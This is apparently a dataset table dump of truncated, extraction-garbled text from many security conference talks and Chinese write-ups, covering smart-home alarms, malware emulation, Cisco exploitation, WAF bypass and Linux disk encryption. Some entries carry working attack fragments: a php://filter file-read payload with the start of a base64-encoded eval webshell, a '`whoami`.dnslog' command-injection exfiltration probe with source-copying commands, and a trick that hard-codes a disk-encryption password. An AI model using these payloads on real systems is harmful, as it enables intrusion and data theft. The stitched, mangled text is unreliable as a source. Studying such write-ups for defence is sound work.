text stringlengths 100 9.93M | category stringclasses 11
values |
|---|---|
Home%Insecurity:%No%alarm,%False%
alarms,%and%SIGINT%
Logan&Lamb&
lamblm@ornl.gov&
&
Agenda%
• Mo/va/on&
• Models&and&Methodology&
• A7ack&Primi/ve&Implementa/on&
• Applica/on&to&three&security&systems&
• Observa/ons&
• Conclusion&
Who%am%I?%
• Researcher&for&Center&for&Trustworthy&
Embedded&Systems&at&ORNL&
• ... | pdf |
Next Generation Process
Emulation with Binee
Kyle Gwinnup @switchp0rt
John Holowczak @skipwich
Carbon Black TAU
The Problem: getting information from binaries
Each sample contains some total set of information. Our goal is to extract as
much of it as possible
Time/Cost to analyze
Sample coverage
Static
Dynamic
High c... | pdf |
The Hacker Pimps
The Hexagon Security Group
Creating Unreliable Systems
“Attacking the Systems that Attack You”
Sysmin Sys73m47ic & Marklar
From:
The Hacker Pimps
The Hacker Pimps
The Hexagon Security Group
Document Versioning
● For a copy of this presentation visit:
● www.hackerpimps.com/docs.html
The Hacker Pimps
The... | pdf |
Cisco Catalyst
Exploitation
Artem Kondratenko
@artkond
Whoami
-Penetration tester @ Kaspersky Lab
-Hacker
-OSC(P|E)
-Skydiver ;)
Long story short
• On March 26th 2017 Cisco announces that numerous
models of switches are vulnerable to unauthenticated
remote code execution vulnerability
• No signs of exploitation in t... | pdf |
• 蔡政達 a.k.a Orange
• CHROOT 成員 / HITCON 成員 / DEVCORE 資安顧問
• 國內外研討會 HITCON, AVTokyo, WooYun 等講師
• 國內外駭客競賽 Capture the Flag 冠軍
• 揭露過 Microsoft, Django, Yahoo, Facebook, Google 等弱
點漏洞
• 專精於駭客⼿手法、Web Security 與網路滲透
#90後 #賽棍 #電競選⼿手 #滲透師 #Web狗 #🐶
– 講 Web 可以講到你們聽不懂就贏了
– 「⿊黑了你,從不是在你知道的那個點上」
– 擺在你眼前是 Feature、擺在駭客眼前就是漏洞
-... | pdf |
VulReport
sylphid@vulreport.net
Agenda
• 弱點揭露現狀
• 為什麼要建置VulReport
• 負責任的弱點揭露
"高超的電腦技術,卻沒有用在正途”
zone-h
Underground
Economy
關於 VulReport
• 由 HITCON(Hacks in Taiwan Conf.) 主要成員發起
• 政府、企業與白帽駭客間的溝通管道及技術交流平台
• 藉由此平台讓政府單位或企業正視漏洞問題
• 增進資安相關訊息的交流
別讓駭客不開心
• 黑色產業 -> 資安產業/公益
• 技術的交流與提昇
• 正面形象的轉變
Google VRP - 1
Google VRP - 2
... | pdf |
护网杯WP-Nu1L
护网杯WP-Nu1L
WEB
签到
SQLManager
SimpleCalculator
easyphp
Pwn
logger
Crypto
Signsystem
2EM
Re
gocrypt
WEB
签到
js里有
SQLManager
原题:https://www.anquanke.com/post/id/200927#h3-6
SimpleCalculator
国赛原题
easyphp
读源码/index.php?page=php://filter/read=convert.base64-encode/resource=index.php,绕过死亡
die,写入aPD9waHAgZXZhbCgkX1BPU... | pdf |
Shellcodes
for ARM:
Your Pills Don’t
Work on Me, x86
Svetlana Gaivoronski @SadieSv
Ivan Petrov @_IvanPetrov_
Why it’s important !
! !Increasing!number!of!ARM3based!devices!
! !Significant!number!of!vulnerable!so:ware!
!!!!!!!and!huge!base!of!reusable!code!
! !Memory!corrup?on!errors!ar... | pdf |
1
Advanced Hardware Hacking
Techniques
Joe Grand (Kingpin)
joe@grandideastudio.com
DEFCON 12
Friday, July 30
2
© 2004 Grand Idea Studio, Inc.
Agenda
The "What" and "Why" of Hardware Hacking
Enclosure & Mechanical Attacks
Electrical Attacks
Final Thoughts and Conclusions
3
© 2004 Grand Idea Studio, Inc.
What is Ha... | pdf |
@Y4tacker
两个好玩的问题
1.为什么往
/WEB-INF/tomcat-web.xml/
/WEB-INF/tomcat-web.xml/
⽂件夹下写东西可以触发重加载
问题来源
问题的⼀切来源于⼀句话:
Trigger a reload of the web app by writing any file to /WEB-INF/tomcat-web.xml/ ,⽂件夹
什么⿁!
当然多提⼀嘴不是每个版本这个tomcat-web.xml都⽣效的具体看配置,详细的往下看
解决
⾸先既然能够在tomcat运⾏后继续加载新的jar到jvm,如果是你会怎么实现呢,答案很显然,
多线程,定时让⼀个⼦进程去监控⽂件的变化,tomc... | pdf |
All your family secrets belong to us -
Worrisome security issues in tracker apps
Siegfried Rasthofer | Fraunhofer SIT, Germany
Stephan Huber | Fraunhofer SIT, Germany
DefCon26, August 11th 2018
Who are we?
§ Head of Department Secure Software
Engineering
§ PhD, M.Sc., B.Sc. in computer science
§ Static and Dynamic C... | pdf |
Take advantage of randomness
Frank Tse
Nexusguard
Agenda
What is random
Some applications of random
Detecting anomalies from randomness
Mitigating ‘random’ attacks
1
2
3
4
Visualizing randomness
5
About::me
From Hong Kong
Researcher in DDoS
I like RFC
IT Security
Identify them correctly
Take action... | pdf |
This talk is not about LTE
vulnerabilities
No cables
Why isn’t it
working?
Scared Poopless – LTE
and *your* laptop
Disclaimer:
During the slides you will be exposed to hacker stock
photos from the internet.
Thank you!
Goldy
aSmig
@octosavvi
Intel Security would like to acknowledge and thank the
Huawei PSIRT team ... | pdf |
Domain Fronting is Dead,
Long Live Domain Fronting
Using TLS 1.3 to evade censors, bypass network
defenses, and blend in with the noise
Erik Hunstad
Outline
0
Domain Fronting 101
●
If you wish to make an apple pie from scratch, you must first invent the universe
●
To understand Domain Fronting, you must first understa... | pdf |
“Resilience is a form of health.”
- Dr. Steve Miles
“Grossman!!!”
I declare the global social space we are building to be naturally independent of the tyrannies you seek to impose on
us.
You have no moral right to rule us nor do you possess any methods of enforcement we have true reason to fear.
- John Perry Barlo... | pdf |
DROID-FF – THE ANDROID
FUZZING FRAMEWORK
TWITTER : @ANTOJOSEP007
GITHUB : @ANTOJOSEPH
@WHOAMI
• security engineer @ intel
• android security enthusiast
• speaker / trainer @ Hitb Amsterdam, brucon / hackinparis / blackhat /
nullcon / ground zero / c0c0n …
• when not hacking , you can see me travelling / djing / bikin... | pdf |
离线安装windbg preview
因为近期的⼀些⼯作问题,⼜重新⽤上了宇宙第⼀调试器 windbg ,但是我是windows
server的ECS环境,没法从微软商店安装 windbg preview ,所以只能暂时安装 windbg 。⼈
都是视觉动物,看着⼿⾥丑陋的 windbg ,我陷⼊了沉思,决定研究⼀下怎么离线安装 wind
bg preview 。
下⾯就是我找到的安装⽅法:
找到 windbg preview 的微软商店安装⻚⾯: https://apps.microsoft.com/store/detail/wi
ndbg-preview/9PGJGD53TN86?hl=zh-hk&gl=HK
然后将这个UR... | pdf |
chromemaclinux
0x00
chrome
chrome
RCE
maclinux --gpu-launcher
bashshell
Windowspoccmd
Linux
Linuxchrome
touchchrometouch
bash
0x01
--gpu-launcher chrome
--gpu-launcher=
--utility-cmd-prefix=
--renderer-cmd-prefix=
sandbox
cc --gpu-launcher ⸺Chromium gpu-launcher
renderer-cmd-prefix
1. gpu-launchergpu
2. renderer... | pdf |
Advanced Exploitation Techniques: Breaking AV-Emulator
XCon2016/by nEINEI
Who is @nEINEI
• nEINEI -
neineit@gmail.com
• Security researcher / software developer /reverse engineer
• http://www.vxjump.net
• Research interests
• Vulnerability, Advanced Exploitation Techniques ,NIPS/HIPS
• Complexity Virus/Reverse engin... | pdf |
DISCLAIMER
• This publication contains references to the products of SAP AG. SAP, R/3, SAP NetWeaver and other
SAP products.
• Products and services mentioned herein are trademarks or registered trademarks of SAP AG in
Germany, in the US and in several other countries all over the world.
• SAP AG is neither the autho... | pdf |
1
CVE-OLON-OOOLS Gitlab 前台RCE 分析 之 L、
N、O
L、起因
N、exiftool 的调⽤点
O、授权认证问题 与 CSRF
P、扩展利⽤
起因在于 有师傅私信提问了,所以周末研究了下,另外有 ⽂章第3部分是基于此篇的扩展,相⽐⽬前⼤
家所熟知的利⽤会更简便也更通⽤。等明天另发⼀篇。
0、起因
2
从 Github 上搜 https://github.com/search?q=CVE-2021-22205 以及 绝⼤部分⼈使⽤的 ⼤家所熟
知的上传的 第⼆个 请求包⼤概如下
3
从这个请求包,第⼀直觉有两个问题。
1、gitlab 是如何调⽤ exiftool 的
2、/uploads/user 接... | pdf |
Defending Networks with
Incomplete Information: A
Machine Learning Approach
Alexandre Pinto
alexcp@mlsecproject.org
@alexcpsec
@MLSecProject
• This is a talk about DEFENDING not attacking
– NO systems were harmed on the development of
this talk.
– We are actually trying to BUILD something here.
• This talk includes... | pdf |
Assisted Discovery of On-Chip Debug Interfaces
Joe Grand (@joegrand)
Introduction
•
On-chip debug interfaces are a well-known
attack vector
-
Can provide chip-level control of a target device
-
Extract program code or data
-
Modify memory contents
-
Affect device operation on-the-fly
-
Gain insight into system operatio... | pdf |
Mac OS X Server
Command-Line
Administration
For Version 10.3 or Later
034-2454_Cvr 10/15/03 11:47 AM Page 1
Apple Computer, Inc.
© 2003 Apple Computer, Inc. All rights reserved.
The owner or authorized user of a valid copy of
Mac OS X Server software may reproduce this
publication for the purpose of learning t... | pdf |
Testimony of
Paul Vixie, Chairman & CEO
Farsight Security, Inc.
before the
Subcommittee on Crime and Terrorism
United States Senate Committee on the Judiciary
Hearing on
Taking Down Botnets: Public and Private Efforts to Disrupt and Dismantle
Cybercriminal Networks
July 15, 2014
I.
INTRODUCTION
Good afternoon Mr. Chair... | pdf |
Many Birds, One Stone: Exploiting a Single
SQLite Vulnerability Across Multiple Software
Kun Yang(@KelwinYang)
About us
●
Beijing Chaitin Tech Co., Ltd(@ChaitinTech)
○
https://chaitin.cn/en
○
pentesting services and enterprise products
●
Chaitin Security Research Lab
○
Pwn2Own 2017 3rd place
○
GeekPwn 2015/2016 awarde... | pdf |
Machine
Learning
Protect against
tomorrow’s
threats
基於機器學習的惡
意軟體分類實作:"
Microsoft"Malware"
Classification"
Challenge"經驗談
Trend Micro
ch0upi
miaoski
Kyle Chung
2 Dec 2016
Machine
Learning
Protect against
tomorrow’s
threats
Machine
Learning
Protect against
tomorrow’s
threats
ch0upi
•
Staff"engineer"in"Trend"Micro
•
Machin... | pdf |
GoBypassAV
整理理了了基于Go的16种API免杀测试、8种加密测试、反沙盒测试、编译混淆、加壳、资源修改等免
杀技术,并搜集汇总了了⼀一些资料料和⼯工具。
免杀专题⽂文章及⼯工具:https://github.com/TideSec/BypassAntiVirus
免杀专题在线⽂文库:http://wiki.tidesec.com/docs/bypassav
本⽂文涉及的所有代码和资料料:https://github.com/TideSec/GoBypassAV/
0x01 基于Go的免杀
Go语⾔言是⾕谷歌2009发布的第⼆二款开源编程语⾔言,Go语⾔言专⻔门针对多处理理器器系统应⽤用程序的编程进
⾏行行了了优化,使⽤用... | pdf |
Tram control system
Hacking in Poland
‘2008.1
(Stuxnet)
Nuclear power
plant in Iran
‘2010.7
Banks and
Broadcasting
companies
‘2013.3
Waste water treatment
system
Hacking in Queensland
‘2000.4
Roosevelt dam
hacking
‘1998.2
Georgia gov
Website defaced
2008.8
Newzeland-Australia
Network hacking
2007.9
Pentagon
hacking
‘... | pdf |
[Nu1L] writup-for-Alictf-2016
MISC
coloroverflow
首先感觉这种包名不像是 CTF 用的,所以直接 Google 之,发现是 Google Play 上开源的游戏
Color Overflow。于是下载下来进行比对,发现多出了几个类无法匹配上原 apk,所以猜测是
自己后加的。分别将多出的类分析之后,发现分别是用语发送请求、生成请求和工具类。我
将其命名为 LogClass、n 和 Utils
程序将请求生成之后向 log.godric.me 发送 POST 请求,在代码里发现数据发送之前用经过了
GZIP 压缩。在 pcap 中,也发现了这个请求,pcap 里显示确实有 Con... | pdf |
1
APISIX CVE-OLOO-OXOTT 漏洞分析与复现
漏洞描述
影响版本
前要介绍
APISIX
JWT
漏洞分析
环境搭建
漏洞复现
漏洞代码修复
修复⽅案
总结
CVE-2022-29266 这个漏洞已经出现有些时间了,正好现在有时间,⽹上也出现了不少分析⽂章,今
天来看看这个漏洞。
在 2.13.1 之前的 Apache APISIX 中,由于 APISIX 中的 jwt-auth 插件依赖于 lua-resty-jwt 库,⽽在
lua-resty-jwt 库返回的错误信息中可能会包含 JWT 的 sceret 值,因此对于开启了 jwt-auth 插件的
APISIX 存在 JWT sceret 的泄露,从... | pdf |
“We don’t need no stinkin’ badges!”
Shawn Merdinger
security researcher
DEFCON 18
Hacking electronic door access controllers
Outline
• EDAC technology
– Trends, landscape
– Vendors
– Architecture
• EDAC real-world analysis
– S2 Security NetBox
• Research, exposure, vulnerabilities, attacks
• Countermeasures & recommen... | pdf |
.NET WebShell 免杀系列Ⅱ之 Tricks 分享
Ivan1ee@dotNet 安全矩阵
[ dotNet 安全矩阵] —— 聚焦于微软.NET 安全技术,关注基于.NET
衍生出的各种红蓝攻防对抗技术、分享内容不限于 .NET 代码审计、
最新的.NET 漏洞分析、反序列化漏洞研究、有趣的.NET 安全
Trick、.NET 开源软件分享、. NET 生态等热点话题,愿你能在这里学
到实在的干货,共同推动.NET 安全氛围卷起来。
配套的[ dotNet 安全矩阵]知识星球优惠活动持续进行,每天只需要 1
块钱不到,就可以让自己从.NET 小白成为高手,因为星球里的资料
和教程很少在市面上广泛传播,价值完全划算... | pdf |
所有操作均在授权项目中进行。
一天下午好兄弟发来一个 ueditor 环境存在.net 任意文件上传一起看下,存在创某盾 waf。
0x01
把所有常用办法都测试例如 uri 填充、post 填充、大并发、参数混淆、参数 fuzz 等等都测试
过后均失败。
后 fuzz 其他扩展名发现 cer、asmx、shtml 可以上传其他 ashx 什么的拦截。
其中 cer 创某盾禁止访问。asmx 文件试了很多个文件访问均 500 报错,谷歌后似乎是因为
要.net4.6 以上才默认支持 asmx,不知道与 iis10 版本有没有关系。
尝试 shtml exec 执行命令提示。
包含文件报错,谷歌说原因是读取的路径或者文件中含有中文,此... | pdf |
Exploiting Keyspace
Vulnerabilities in Locks
Bill Graydon
@access_ctrl
b.graydon@ggrsecurity.com
github.com/bgraydon
Take a look at your keyring...
2
Outline
●
How locks & keys work
●
Intro to the tools I’m releasing
●
Brute forcing all possible keys
●
Reading the pins in a lock
●
Impressioning with extra informa... | pdf |
1
Websocket内存⻢利⽤的些补充
jspjs利⽤
WsProxy内存⻢
前⼀段时间有师傅提出了基于websocket的内存⻢,并给出了实现:
https://github.com/veo/wsMemShell
本来想写⼀写,但是看到https://tttang.com/archive/1673/ 这篇师傅的⽂章已经写的很好了,这⾥就
提⼀些利⽤⽅⾯的东⻄。
最新版本的蚁剑已经⽀持连接websocket协议的内存⻢,在官⽅更新doc⾥提到pswindows跟
cmdlinux可以使⽤,其实jspjs类型也是可以直接连接的。上篇⽂章https://yzddmr6.com/posts/java-
expression-explo... | pdf |
1
Spring Security CVE-OLOO-OOXVW漏洞分析
⾸先查看官⽅公告
https://spring.io/blog/2022/05/15/cve-2022-22978-authorization-bypass-in-
regexrequestmatcher
注意到和 RegexRequestMatcher 有关,在官⽅仓库找到了最近修改
和 RegexRequestMatcher 有关的代码。
https://github.com/spring-projects/spring-
security/commit/472c25b5e8b7374ba7e1b194ea09f43601f6f1c2
⼀、漏洞简单分... | pdf |
Traffic Interception & Remote Mobile Phone
Cloning with a Compromised CDMA Femtocell
Doug DePerry
Tom Ritter
Andrew Rahimi
iSEC Partners
• The specific method used to access the device that
makes the demonstration possible has been resolved by
Verizon Wireless through a security patch.
• The Network Extenders... | pdf |
(i) to hold the Disclosing Party’s Proprietary Information in confidence and to take reasonable precautions to protect such Proprietary Information (including, without
limitation, all precautions the Receiving Party employs with respect to its confidential materials),
(ii) not to divulge any such Proprietary Informati... | pdf |
Network Attack
Visualization
Greg Conti
www.cc.gatech.edu/~conti
Disclaimer
The views expressed
in this presentation
are those of the
author and do not
reflect the official
policy or position of
the United States
Military Academy,
the Department of
the Army, the
Department of
Defense or the U.S.
Government... | pdf |
Attacks you can’t combat:
Vulnerabilities of most
robust mobile operators
Sergey Puzankov
About me
Telecom
7+ years in telecom
security
18+ years in telecom
industry
Security
Knowledge
sharing
Research results &
community contribution
@xigins
sergey_puzankov
spuzankov@ptsecurity.com
SS7 basics
SS7 (... | pdf |
DCFluX in:
License to
Transmit
DCFluX in:
License to
Transmit
Presented By:
Matt Krick, DCFluX – K3MK
Chief Engineer, New West Broadcasting Systems, Inc.
DEFCON 19; Las Vegas, NV
“Where have all the
weirdos gone?”
--Moxie Marlinspike
Hidden Agenda
1. Fuck Your Stupid Smart Phone
2. Amateur Radio
3. Ge... | pdf |
DEF CON 19:
Getting SSLizzard
Nicholas J. Percoco – Trustwave SpiderLabs
Paul Kehrer – Trustwave SSL
Copyright Trustwave 2011
Agenda
•
Introductions
•
Primer / History: SSL and MITM Attacks
•
Mobile SSL User Experience
•
Research Motivations
•
Research Implications
•
Data Transmission Assault Course C... | pdf |
The Market for Malware
Dr. Thomas J. Holt
Assistant Professor
Department of Criminal Justice
University of North Carolina at Charlotte
tjholt@uncc.edu
704-687-6081
Copyright 2007. All references to this work must
appropriately cite the author, Thomas J. Holt.
Digital Crime Markets
• The problem of malware and computer... | pdf |
Bypassing All
Bypassing All
Web Application Firewalls
Web Application Firewalls
OuTian
<outian@chroot.org>
Agenda
Agenda
Introduction
What is WAF
Why need WAF
What does WAF do
How to Bypass WAF
Q & A
Introduction
Introduction
近年來許多企業開始意識到傳統的資安設
備無法防護針對 Web 應用程式的攻擊
因此紛紛開始佈署「Web Application
Firewall」(以下簡... | pdf |
1
Advanced Wireless Attacks Against
Enterprise Networks
Course Guide
Version 1.0.2
Gabriel Ryan
@s0lst1c3 @gdssecurity
gryan@gdssecurity.com
solstice.me
2
Introduction ........................................................................................................................... 3
Lab Setup Guide... | pdf |
Weaponizing Lady GaGa
PsychoSonic Attacks
Brad (theNURSE) Smith
Private Practice Informatics
Nurse
What the heck is PsychoSonics?
• Sounds that effect the Brain
• “Harmonize” with brain
• Not NLP, Yes SE
Heinrich Wilhelm Dove
• Binary beats founder
• One for the first
Climatologist
• Binaural, Monaural, an... | pdf |
Linux 全盘加密
看了橙子酱大佬的加密分区解密让我想起了我之前做过 Linux 的全盘加密。
特此分享一下思路。。。。
1. 首先安装系统选择 /(根)分区加密。
就 3 个分区。一个 swap 一个 boot 一个根分区(加密,密码自定义)
其余都正常安装,就拿 centos6.9 举例。
2.进入系统,打开/usr/share/dracut/modules.d/90crypt/目录(看了说明文档找到的)
修改 cryptroot-ask.sh
把 108-112 行加上“#”注释,然后增加一行(如图)
echo "password" | cryptsetup luksOpen -T1 "$device" "... | pdf |
Backdooring the Lottery
and
Other Security Tales
from Gaming
July 30, 2017
Gus Fritschie and Evan Teitelman
Presentation Overview
1. Introductions
2. What has happened since 2011
3. Historical overview of security incidents in gaming
4. Eddie Tipton and the lottery
5. Russian slot attacks
6. Conclusion
© SeNet Inter... | pdf |
Cyberpeace Whitepaper
Is WebAssembly Really Safe? - Wasm VM Escape and RCE
Vulnerabilities Have Been Found in New Way
July 19, 2022 – Version 1.0
Prepared by
Zhao Hai(@h1zhao)
Zhichen Wang
Mengchen Yu
Lei Li
Abstract
WebAssembly(Wasm) supports binary format which provides languages such as
C/C++, C# and Rust with a com... | pdf |
前⾔
今天遇到⼀个有意思的Linux命令执⾏绕过分享⼀下。
某⽹络设备后台有个Ping功能,命令执⾏⽆回显,使⽤
dnslog收到请求,因此icmp、dns出⽹。
但是进⼀步命令执⾏的时候发现存在很多替换为空的过滤。
第⼀步绕过,cp命令读取源码。
ping.php中存在参数过滤函数,并且使⽤ exec() 命令执⾏因此⽆回显。
根据include包含的⽂件必然能找到过滤函数所在的⽂件。
过滤如下
`whoami`.dnslog
cp ping.php ping.txt
cd ..\ncd ..\ncd ..\ncd ..\ncd model\ncp filter.php filter.txt
$val = str_replace(... | pdf |
一、概述
最近需要逆深信服的 Easyconnect.apk,无壳但有混淆,so 层抛弃整个系统通信框架,
使用自编译的 openssl 为后续与服务器通信(图片均已厚码处理)。感谢看雪高研。有什
么错误还请师傅指出。
二、连接服务器请求分析
连接服务器时,会发送先后两个请求,下面先看第一个:
先使用脚本 hook onclik 点击事件,得到所实现的 ConnectActivity:
[WatchEvent] onClick: com.sangfor.vpn.client.phone.ConnectActivity
跟入 o():
o()中调用 showDialog(10)显示对话框后,再新建 cb 对象,并新建异步... | pdf |
BRC4 - Brute Ratel Customized Command and
Control Center
Ratel War Room
Ratel Server - TeamServer
API
Ratel War Room is an API driven server which works over HTTP and WebSocket
Start Mode
Ratel Mode
Ratel mode is the core server mode which interacts with badgers, starts listener and is your main C2 communication channe... | pdf |
Attacking .NET
Applications at
Runtime
Jon McCoy - 2010
www.DigitalBodyGuard.com
What will this presentation cover?
How to pWN closed-source .NET
applications in new and dynamic ways
New tools I am releasing
Show how incredibly vulnerable .NET
applications are
What tools will you get?
New Metasploit payload
Tools ... | pdf |
Dam Control
Substation
Gas Distribution
Petrochemical
http://www.openplcproject.com
Editor
GUI Builder
Raspberry Pi
UniPi
Linux (soft-PLC)
Windows (soft-
PLC)
ESP8266
Arduino
PiXtend
FreeWave
Zumlink
Slave ID
(1 byte)
F. Code
(1 byte)
Data
(n bytes)
CRC
(2 bytes)
Slave ID
(1 byte)
F. Code
(1 ... | pdf |
NinjaTV - Increasing Your
Smart TV’s IQ Without
Bricking It
Felix Leder
D
About Myself
• Passion:
• Reverse Engineering (+ tool development)
• Being out in the snow, being out on a bike, being out in the water
• Fun Projects:
• Bug hunting in malware
• Botnet takeovers and countermeasure
• The Honeynet Project
• $$$... | pdf |
Digital Vengeance
Exploiting the Most Notorious C&C Toolkits
@professor__plum
Disclaimer
The views expressed herein do not necessarily state or reflect the views of
my current or former employers.
I am not responsible for any use or misuse of the information provided.
Implementation of the information given is at y... | pdf |
中国网安集团·广州三零卫士
伍智波(SkyMine)
①Linux主要日志类型的分析
②Windows主要日志类型的分析
③某次真实入侵事件的日志分析过程
④入侵案例攻击链分析
①Linux主要日志类型的分析
accesslog
accesslog是web中间件最
为重要的日志文件之一,它
记录了访问web应用的所有
请求,其中记录的字段主要
包括来源IP、请求时间、请
求方法、请求路径、HTTP状
态码、请求包大小等,是识
别web攻击的重要指标。
192.168.97.1 - - [02/Mar/2018:02:24:16 +0800]
"GET /guestbook.php HTTP/1.1" 200 831 "-"
"M... | pdf |
护 网 的 起 源 和 演
变
01
未 知 攻 , 焉 知
防
02
实 战 出 真
知
03
目 录
CONTENTS
护网的起源和演
变
PART 1
护 网 的 起 源 和 演 变 — 新 形 势 下 攻 防 对 抗
法律法规
国家标准
基线检查
渗透测试
国家
层面
APT
组织型
常态化攻防演练
新的验证体系
监管要求
国际标准、规范
旧的验证体系
安全检查
漏洞扫描
思路转变
验证体系思路转变
“ 锁 盾 ” 攻 防 演 习
“Locked Shields”系列演习是北约年度例行性网络
安全演习,于2010年启动;
模式:假想国家“Berylia”;
目标:攻击模拟的海军基地、电站等关键信息基础
... | pdf |
1
浅谈PHP源代码保护⽅案&受保护PHP代码の解
密还原
前⾔
PHP 加密⽅案分析
⽆扩展⽅案
源代码混淆
⼿⼯解密
⾃动化通⽤解密
PHP扩展⽅案
源代码混淆
⼿⼯解密
⾃动化通⽤解密
opcode
还原代码
附录
PHP扩展编译
总结
参考
php是⼀种解释型脚本语⾔.
与编译型语⾔不同,php源代码不是直接翻译成机器语⾔.⽽是翻译成中间代码(OPCODE) ,再由解释器
(ZEND引擎)对中间代码进⾏解释运⾏ .
在php源代码的保护在原理可以分为3⼤类.
源代码混淆(编码)
OPCODE混淆(编码)
修改解释引擎(虚拟机)
前⾔
●
●
●
2
在部署上可以分为2⼤类.
⽆扩展
有扩展
下⾯分析下各种... | pdf |
APISIX_CVE-2022-29266
Patch
https://github.com/apache/apisix/commit/61a48a2524a86f2fada90e8196e147538842db89
jwt
jwt-auth consumer
JWT Authentication service route consumer cookie
jwt-auth HS256 RS256
jwt:load_jwt(token)
https://github.com/SkyLothar/lua-resty-jwt/blob/ee1d024071f872e2b5a66eaaf9aeaf86c5ba... | pdf |
从 后 门 到 漏 洞 — — 智 能 设 备 私 有 协 议 中 的 安 全 问 题
魏凡 绿盟科技 格物实验室 安全研究员
0 1
概述
0 2
0 3
0 4
私有协议逆向分析的几个关键点
某私有协议漏洞挖掘之旅
总结与建议
目录
0 1
概述
0 2
0 3
0 4
私有协议逆向分析的几个关键点
某私有协议漏洞挖掘之旅
总结与建议
目录
智能设备中的私有协议
私有协议一般来说指未文档化的协议,格式未知,一般具有以下特点:
⚫ 从功能上来讲,一般用于运维管理/服务发现等功能
⚫ 一般监听于TCP/UDP的大端口
⚫ 多数作为服务端,部分可以在厂商官网找到协议的客户端
私有协议的格式未知,所以逆向分析较难,因此公开的漏洞较少,但... | pdf |
Reverse proxies &
Inconsistency
Aleksei "GreenDog" Tiurin
About me
• Web security fun
• Security researcher at Acunetix
• Pentester
• Co-organizer Defcon Russia 7812
• @antyurin
"Reverse proxy"
- Reverse proxy
- Load balancer
- Cache proxy
- …
- Back-end/Origin
"Reverse proxy"
URL
http://www.site.com/long/path/here.ph... | pdf |
Timeless Timing Attacks
by
Tom Van Goethem & Mathy Vanhoef
Hello!
Tom Van Goethem
Researcher at DistriNet -
KU Leuven, Belgium
Fanatic web & network
security enthousiast
Exploiter of side-channel attacks in
browsers & the Web platform
Mathy Vanhoef
Postdoctoral Researcher at
NYU Abu Dhabi
Soon: professor at KU ... | pdf |
Web渗透测试之逻辑漏洞
挖掘
演讲嘉宾:hackbar
上海银基信息安全技术股份有限公司
简单VS复杂
1.思考
1.1、利用工具简单:
数据包抓取工具(Burpsuit、fiddler等)
1.2、思路复杂:
核心:
绕过真实用户身份或正常业务流程达到预期的目的
1.2.1、用户身份:认证
用户身份特性认证
本地认证
服务器端认证
1.2.2、业务流程:对业务的熟悉程度(各种类
型的网站、业务模式)
电信网厅业务清单图解
2、逻辑漏洞类型
支付漏洞
密码找回漏洞
任意用户登录漏洞
认证缺陷(弱认证、认证凭证获取)
接口枚举
越权(有条件的越权:空值绕过)
。。。。。。。
2.1、支付漏洞
2.1.1、支付漏洞突破口:
一、订单相... | pdf |
© 2011 NATO Cooperative Cyber Defence Centre of Excellence, June 2011 All rights reserved. No part of this pub-
lication may be reprinted, reproduced, stored in a retrieval system, or transmitted in any form or by any means,
electronic, mechanical, photocopying, recording or otherwise, without the prior written permis... | pdf |
Tools for Censorship Resistance
Rachel Greenstadt
greenie@eecs.harvard.edu
Defcon XII
July 29, 2004
http://www.eecs.harvard.edu/ greenie/defcon-slides.pdf
Tools for Censorship Resistance – p.1/37
Overview
Approaches to Censorship
Circumvention methods
Case study: China
Censorship in a “free” society
the LOCKSS project
... | pdf |
感知·诱捕·情报·协作
[ Kimon@灯塔实验室 ]
⺴络空间⼯控系统威胁情报
关于我们 | [ Kimon@灯塔实验室 ]
王启蒙 Kimon
电话:18500851413
邮箱:kimon@plcscan.org
微信:ameng929
基础威胁情报 VS. 高级威胁情报
信息收集方式 VS. 威胁捕获技术
被动威胁感知架构体系
从威胁数据到威胁情报
[ 灯塔实验室@KCon ]
Part. 01
基础威胁情报 VS. ⾼级威胁情报
基础威胁情报 VS. ⾼级威胁情报| [灯塔实验室@KCon ]
国外针对网络空间的情报收集计划
SHINE计划——Project Shodan Intelligence Extraction
X... | pdf |
目
录
封面
扉页
版权
内容提要
作者简介
前言
第1章 初识C语言
1.1 C语言的起源
1.2 选择C语言的理由
1.2.1 设计特性
1.2.2 高效性
1.2.3 可移植性
1.2.4 强大而灵活
1.2.5 面向程序员
1.2.6 缺点
1.3 C语言的应用范围
1.4 计算机能做什么
1.5 高级计算机语言和编译器
1.6 语言标准
1.6.1 第1个ANSI/ISO C标准
1.6.2 C99标准
1.6.3 C11标准
1.7 使用C语言的7个步骤
1.7.1 第1步:定义程序的目标
1.7.2 第2步:设计程序
1.7.3 第3步:编写代码
1.7.4 第4步:编译
1.7.5 第5步:运行程序
1.7.6 第6... | pdf |
Exploiting 0ld Mag-stripe Information
with New Technology
Salvador Mendoza
Twitter: @Netxing
Blog: salmg.net
About Me
● Security Researcher
● Samsung Pay:
Tokenized Numbers,
Flaws and Issues
@Netxing
Analyzing previous talks/tools
● Major Malfunction DEFCON 14
Magstripe Madness
● Samy Kamkar
MagSpoof - 2015
● Wes... | pdf |
Jesse
Michael
Mickey
Shkatov
@JesseMichael
@HackingThings
WHO ARE WE
AGENDA
• Beginning
• .
• .
• .
• .
• Conclusions
• Q&A
•
Diego Juarez
•
https://www.secureauth.com/labs/advisories/asus-drivers-elevation-privilege-vulnerabilities
•
https://www.secureauth.com/labs/advisories/gigabyte-drivers-elevation-privilege-vulne... | pdf |
Module 3
Understanding and countering malware’s evasion
and self-defence
https://github.com/hasherezade/malware_training_vol1
Introduction
Malware: Evasion and self-defense
Malware:
Evasion and self-defense
• In order to carry on its mission, malware must remain undetected
• Malware needs to defend itself from:
• An... | pdf |
Exploring Layer 2 Network Security
in Virtualized Environments
Ronny L. Bull
&
Jeanna N. Matthews
Road Map
© 2015 Ronny L. Bull - Clarkson University
● Context for the Problem of Layer 2 Network Security in
Virrtualized Environments
– Virtualization, Multi-tenant environments, Cloud
services
– Physical networking ba... | pdf |
After 35 years of serious investigation, exploration, and reflection, engaged with the best
researchers in the field, it was time to make as succinct and clear a statement as I could,
within the constraints of 1200 words for the Crossroads section in the Sunday Milwaukee
Journal Sentinel.
It was also a way for a m... | pdf |
Covert Debugging
Circumventing Software
Armoring Techniques
Offensive Computing, LLC
Danny Quist
Valsmith
dquist@offensivecomputing.net
valsmith@offensivecomputing.net
Offensive Computing - Malware Intelligence
Danny Quist
• Offensive Computing, Cofounder
• PhD Student at New Mexico Tech
• Reverse Engineer
• Exploit D... | pdf |
PIG: Finding Truffles Without Leaving A Trace
Ryan Linn
DEFCON 19
Copyright Trustwave 2010
Overview
•
Introduction
•
Why are we here ?
•
How will this help me ?
•
Talking is boring show me
•
That’s neat, how does this work ?
•
Protocols and Plugins
•
Remediation
Copyright Trustwave 2010
Introductio... | pdf |
quickbreach@defcon26:~# ./smbetray.py --help
